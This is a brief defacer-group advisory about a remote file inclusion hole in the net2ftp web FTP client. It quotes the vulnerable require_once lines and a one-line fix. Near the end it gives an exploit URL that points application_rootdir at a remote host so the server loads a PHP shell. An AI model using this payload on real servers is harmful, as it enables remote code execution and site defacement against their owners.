±-------------------------------------------------------------------
+
- net2ftp: a web based FTP client :) <= Remote File Inclusion
±-------------------------------------------------------------------
+
±-------------------------------------------------------------------
+
- Code index.php:
- …
- equire_once($application_rootdir . "/includes/authorizations.inc.php");
- require_once($application_rootdir . "/includes/bookmark.inc.php");
- require_once($application_rootdir . "/includes/browse.inc.php");
- require_once($application_rootdir . "/includes/database.inc.php");
- …
±-------------------------------------------------------------------
+
- $application_rootdir is not properly sanitized before being used.
- The bug is in the "net2ftp" Package for net2ftp.
±-------------------------------------------------------------------
+
- Solution:
- Add this line to your php-file:
- $application_rootdir ="user/dir" //Your root path
±-------------------------------------------------------------------
http://[target]/index.php?application_rootdir=http://phpshell
+
±-------------------------------------------------------------------
- [W]orld [D]efacers [T]eam
- Greets:
- || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
- || Pro Hacker ||
±------------------------[ W D T ]----------------------------------